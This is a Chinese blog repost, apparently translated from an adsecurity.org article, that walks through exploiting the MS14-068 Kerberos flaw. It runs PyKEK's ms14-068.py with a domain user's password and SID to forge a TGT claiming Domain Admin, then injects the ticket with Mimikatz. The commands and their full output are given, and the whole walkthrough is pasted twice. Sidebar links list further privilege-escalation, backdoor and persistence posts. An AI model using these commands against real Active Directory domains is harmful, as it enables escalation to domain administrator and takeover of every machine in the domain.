- 浏览: 278849 次
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
原文地址:http://adsecurity.org/?p=676
Kerberos漏洞允许攻击者提权域用户成为管理员账户。攻击者可以使用这些权限来访问域中任何机器,包含DC。攻击者必须有一个域口令来进行这种攻击
本文使用MS14-068成功攻击Server 2012 和 2012/R2但是未能成功攻击2008 R2 DC
开始攻击
攻击账户为darthsidious@lab.adsecurity.org,该账户属于域用户和工作站组。假定该用户是网络中授权用户,以及希望获得域管理员权限来进行恶意行为。用户已经获得域账户并且知道密码。
当攻击者获得某台电脑的域口令和本地管理员权限后,他可以利用PyKEK通过与DC进行标准通信来伪造一个TGT。
PyKEK ms14-068.py脚步需要下列信息来声称TGT:
可以通过whoami命令来获得SID
可以在powershell中运行下列命令获得:
第一阶段--生成TGT
生成的TGT Kerberos票据保存在ccache文件中,然后可以使用Mimikatz copy到windows电脑中
c:\Temp\pykek>ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-222232912
7-1110 -d adsdc02.lab.adsecurity.org
[+] Building AS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending AS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Building TGS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending TGS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Creating ccache file ‘TGT_darthsidious@lab.adsecurity.org.ccache’… Done!
接下来使用本地管理员权限登陆电脑来连接到目标DC。
whoami命令显示我是ADSWKWIN7电脑的管理员。
klist显示当前没有Kerberos票据。
PyKEK ms14-068.py脚本把生成的TGT保存到一个ccache文件中(c:\temp\pykek )
第二阶段--注入TGT获得TGS
使用Mimikatz 来注入
c:\Temp\pykek>c:\temp\mimikatz\mimikatz.exe “kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache” exit
.#####. mimikatz 2.0 alpha (x64) release “Kiwi en C” (Nov 20 2014 01:35:45)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
‘## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo)
‘#####’ with 15 modules * * */
mimikatz(commandline) # kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache
Principal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Data 0
Start/End/MaxRenew: 12/7/2014 3:10:30 PM ; 12/8/2014 1:10:30 AM ; 12/14/2014 3:10:30 PM
Service Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Target Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Client Name (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000017 – rc4_hmac_nt
af5e7b47316c4cebae0a7ead04059799
Ticket : 0x00000000 – null ; kvno = 2 […]
* Injecting ticket : OK
mimikatz(commandline) # exit
Bye!
因为我注入一个伪造(声明我是域管理员)的TGT到我的session中,所以当TGT传递到一个未patched的DC,ticket表明我是这些组的成员。
Kerberos漏洞允许攻击者提权域用户成为管理员账户。攻击者可以使用这些权限来访问域中任何机器,包含DC。攻击者必须有一个域口令来进行这种攻击
本文使用MS14-068成功攻击Server 2012 和 2012/R2但是未能成功攻击2008 R2 DC
开始攻击
攻击账户为darthsidious@lab.adsecurity.org,该账户属于域用户和工作站组。假定该用户是网络中授权用户,以及希望获得域管理员权限来进行恶意行为。用户已经获得域账户并且知道密码。
当攻击者获得某台电脑的域口令和本地管理员权限后,他可以利用PyKEK通过与DC进行标准通信来伪造一个TGT。
PyKEK ms14-068.py脚步需要下列信息来声称TGT:
引用
Principal Name (UPN) [-u]: darthsidious@lab.adsecurity.org
Password [-p]: TheEmperor99!
User Security IDentifier (SID) [-s]: S-1-5-21-1473643419-774954089-2222329127-1110
目标Domain Controller [-d]: adsdc02.lab.adsecurity.org
Password [-p]: TheEmperor99!
User Security IDentifier (SID) [-s]: S-1-5-21-1473643419-774954089-2222329127-1110
目标Domain Controller [-d]: adsdc02.lab.adsecurity.org
可以通过whoami命令来获得SID
可以在powershell中运行下列命令获得:
[Security.Principal.WindowsIdentity]::GetCurrent( )
第一阶段--生成TGT
生成的TGT Kerberos票据保存在ccache文件中,然后可以使用Mimikatz copy到windows电脑中
引用
c:\Temp\pykek>ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-222232912
7-1110 -d adsdc02.lab.adsecurity.org
[+] Building AS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending AS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Building TGS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending TGS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Creating ccache file ‘TGT_darthsidious@lab.adsecurity.org.ccache’… Done!
接下来使用本地管理员权限登陆电脑来连接到目标DC。
whoami命令显示我是ADSWKWIN7电脑的管理员。
klist显示当前没有Kerberos票据。
PyKEK ms14-068.py脚本把生成的TGT保存到一个ccache文件中(c:\temp\pykek )
第二阶段--注入TGT获得TGS
使用Mimikatz 来注入
引用
c:\Temp\pykek>c:\temp\mimikatz\mimikatz.exe “kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache” exit
.#####. mimikatz 2.0 alpha (x64) release “Kiwi en C” (Nov 20 2014 01:35:45)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
‘## v ##’ http://blog.gentilkiwi.com/mimikatz (oe.eo)
‘#####’ with 15 modules * * */
mimikatz(commandline) # kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache
Principal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Data 0
Start/End/MaxRenew: 12/7/2014 3:10:30 PM ; 12/8/2014 1:10:30 AM ; 12/14/2014 3:10:30 PM
Service Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Target Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Client Name (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000017 – rc4_hmac_nt
af5e7b47316c4cebae0a7ead04059799
Ticket : 0x00000000 – null ; kvno = 2 […]
* Injecting ticket : OK
mimikatz(commandline) # exit
Bye!
因为我注入一个伪造(声明我是域管理员)的TGT到我的session中,所以当TGT传递到一个未patched的DC,ticket表明我是这些组的成员。
发表评论
-
[图] windows 10
2015-08-18 20:37 284网上下载的图片,忘了来源 -
windows提权集合
2015-06-30 00:23 543https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 509原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1478原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 448引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 754原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 385原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 474原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2821原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 301原文地址:http://blog.gdssecurity.co ... -
自动化Man-in-the-Middle SSHv2攻击
2015-03-18 01:26 1019参考:http://www.david-guembel.de/ ... -
window增加硬盘性能方法
2015-02-05 01:03 337参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 772原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 848https://blog.netspi.com/15-ways ... -
内网工具--LANs.py
2015-01-13 00:01 593下载地址:https://github.com/DanMcIn ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 916原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1519下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1007原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3741原文地址:https://cyberarms.wordpres ... -
vmss2core将VMware镜像转换成memory dump
2014-12-26 23:59 0参考:http://kb.vmware.com/selfser ...
相关推荐
1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位域用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号...
赠送jar包:apacheds-kerberos-codec-2.0.0-M15.jar; 赠送原API文档:apacheds-kerberos-codec-2.0.0-M15-javadoc.jar; 赠送源代码:apacheds-kerberos-codec-2.0.0-M15-sources.jar; 赠送Maven依赖信息文件:...
赠送jar包:apacheds-kerberos-codec-2.0.0-M15.jar; 赠送原API文档:apacheds-kerberos-codec-2.0.0-M15-javadoc.jar; 赠送源代码:apacheds-kerberos-codec-2.0.0-M15-sources.jar; 包含翻译后的API文档:...
Kerberos 是一种身份验证协议,它作为一种可信任的第三方认证服务,通过使用对称加密技术为客户 端/服务器应用程序提供强身份验证。在域环境下,AD域使用Kerberos协议进行验证,熟悉和掌握 Kerberos协议是域渗透的...
目前,仅实现了少数功能(以相当快速的方式)来利用 MS14-068 (CVE-2014-6324) 。 更多来了…… 作者 西尔万·蒙内 联系人:solucom dot fr 的 sylvain dot monne 图书馆内容 kek.krb5:Kerberos V5 ( ) ASN.1 ...
离线安装包,亲测可用
安装kerberos5时需要的rpm包,版本1.15.1-37.el7_6.x86_64。里面4个文件:krb5-libs-1.15.1-37.el7_6.x86_64.rpm;krb5-server-1.15.1-37.el7_6.x86_64.rpm;krb5-workstation-1.15.1-37.el7_6.x86_64.rpm;libkadm5...
Kerberos-The-Definitive-Guide.chm
Kerberos权威指南 ,Kerberos The Definitive Guide。Single sign-on is the holy grail of network administration, and Kerberos is the only game in town. Microsoft, by integrating Kerberos into Active ...
1.无凭证情况下 ...MS14-068 Kerberos SPN扫描 Kerberos的黄金门票 Kerberos的银票务 域服务账号破解 凭证盗窃 NTLM relay Kerberos委派 地址解析协议 zerologon漏洞 CVE-2021-42278 && CVE-2021-42287
presto-kerberos配置参数设置,presto-kerberos配置参数设置。
CDH开启Kerberos+Sentry权限控制-实施配置指南,完整的详细教程
Kerberos认证机制,适用于初学者,基础
标签:apacheds-kerberos-shared-1.0.1.jar.zip,apacheds,kerberos,shared,1.0.1,jar.zip包下载,依赖包
官方离线安装包,亲测可用
Kerberos原理--经典对话 中文版最近在学习Kerberos原理,无意间发现了,好家伙全是英文,果断网上寻找中文版。但网上的翻译水平实在不敢恭维,很多都是机翻,读都读不通,这个我觉得还好。让我要命的是,连最基本的...
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
ambari开启Kerberos失败,报错The 'krb5-conf' configuration is not available
样本可以在spring-security-kerberos-samples 。 有关更多信息,请查阅参考文档。 从源头建造 Spring Security Kerberos使用基于的构建系统。 在下面的说明中,。/ 是从源树的根调用的,并用作构建的跨平台,自包含...
这是应用Kerberos补丁的 。 至少对我来说,可以在Ubuntu 12.04机器上使用。 依赖关系: 。 如果将Kerberos编译到其他位置,例如$ HOME / usr,则使用以下命令编译Cntlm ./configure --enable-kerberos export ...